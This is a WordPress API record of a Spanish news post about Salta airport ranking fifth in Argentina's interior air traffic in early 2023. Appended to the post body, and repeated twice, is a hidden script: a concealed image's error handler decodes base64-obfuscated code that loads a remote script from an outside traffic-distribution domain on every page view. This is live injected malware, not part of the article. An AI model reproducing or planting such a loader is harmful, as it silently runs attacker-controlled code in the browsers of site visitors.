{"id":2837,"date":"2023-07-11T12:43:14","date_gmt":"2023-07-11T15:43:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2837"},"modified":"2025-08-14T00:13:06","modified_gmt":"2025-08-14T03:13:06","slug":"el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2837","title":{"rendered":"El aeropuerto de Salta entre los cinco con mayor tr\u00e1fico del interior del pa\u00eds"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#56032b\"><em>De acuerdo a las estad\u00edsticas conformadas por la Administraci\u00f3n Nacional de Aviaci\u00f3n Civil (ANAC), el aeropuerto Mart\u00edn Miguel de G\u00fcemes se ubica como la quinta terminal a\u00e9rea del interior con mayor tr\u00e1fico durante el primer semestre de 2023.<\/em><\/h4>\n\n\n\n<p>El primer semestre de 2023 sum\u00f3 un nuevo registro positivo para el turismo provincial. De acuerdo a las estad\u00edsticas conformadas por ANAC el Aeropuerto Internacional Mart\u00edn Miguel de G\u00fcemes se ubic\u00f3 en el puesto n\u00famero 5 del ranking de las estaciones a\u00e9reas del interior del pa\u00eds con mayor tr\u00e1fico junto a C\u00f3rdoba, Mendoza, Bariloche y Puerto Iguaz\u00fa.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7909-el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7909-el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais.jpg\" alt=\"El aeropuerto de Salta entre los cinco con mayor tr\u00e1fico del interior del pa\u00eds\" width=\"313\" height=\"209\"\/><\/a><\/figure><\/div>\n\n\n<p>Durante el primer semestre arribaron al Aeropuerto provincial un total de 702.000 pasajeros, esto implic\u00f3 un crecimiento del 28% respecto al periodo 2022. ANAC cuantifica los movimientos que se registran en cada aeropuerto, que son vuelos que arriban y egresan de cada ciudad.<\/p>\n\n\n\n<p>En t\u00e9rminos de conectividad Salta se destaca por contar con una ruta directa con San Pablo (Brasil) que es el principal HUB de Am\u00e9rica del Sur, y la pr\u00f3xima puesta en marcha de la conexi\u00f3n con Lima que iniciar\u00e1 en diciembre pr\u00f3ximo. A las mencionadas, se le suma una importante red de conexi\u00f3n con otros destinos nacionales como Bariloche, C\u00f3rdoba, Buenos Aires, Tucum\u00e1n, Iguaz\u00fa, Mendoza, Resistencia, Rosario y Neuqu\u00e9n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7910-el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7910-el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais.jpeg\" alt=\"El aeropuerto de Salta entre los cinco con mayor tr\u00e1fico del interior del pa\u00eds\" width=\"329\" height=\"200\"\/><\/a><\/figure><\/div>\n\n\n<p>Salta viene de ser distinguida como el primer destino en ventas de PreViaje, este hecho marc\u00f3 indicadores hist\u00f3ricos para mayo y junio como el impacto econ\u00f3mico generado que fue de $ 34.805.631.304.&nbsp;<\/p>\n\n\n\n<p>\u201cLas estad\u00edsticas que estamos recibiendo por parte de diferentes organismos son la consecuencia de un trabajo mancomunado entre todos los actores que integramos la industria tur\u00edstica. Tal como nos pide el Gobernador Gustavo S\u00e1enz, estamos trabajando en pos de que el turismo siga creciendo en toda la provincia, con m\u00e1s conectividad y m\u00e1s desarrollo\u201d, destac\u00f3 el ministro de turismo y deportes Mario Pe\u00f1a.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7911-el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7911-el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais.jpg\" alt=\"El aeropuerto de Salta entre los cinco con mayor tr\u00e1fico del interior del pa\u00eds\"\/><\/a><\/figure>\n\n\n\n<p><strong>Vacaciones de invierno<\/strong><\/p>\n\n\n\n<p>Pocos d\u00edas atr\u00e1s el Ministerio de Turismo y Deportes lanz\u00f3 el calendario invernal de actividades con m\u00e1s de 500 propuestas culturales, gastron\u00f3micas, de naturaleza y aventura programadas en las siete regiones tur\u00edsticas.<\/p>\n\n\n\n<p>Los interesados en consultar el calendario completo pueden hacerlo ingresando a https:\/\/www.saltacalendario.gob.ar\/&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-aeropuerto-de-salta-entre-los-cinco-con-mayor-trafico-del-interior-del-pais-90641\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>De acuerdo a las estad\u00edsticas conformadas por la Administraci\u00f3n Nacional de Aviaci\u00f3n Civil (ANAC), el aeropuerto Mart\u00edn Miguel de G\u00fcemes se ubica como la quinta terminal a\u00e9rea del interior con mayor tr\u00e1fico durante el primer semestre de 2023. El primer semestre de 2023 sum\u00f3 un nuevo registro positivo para el turismo provincial. De acuerdo a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2838,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2837","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2837"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2837"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2837\/revisions"}],"predecessor-version":[{"id":7030,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2837\/revisions\/7030"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2838"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2837"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2837"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2837"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}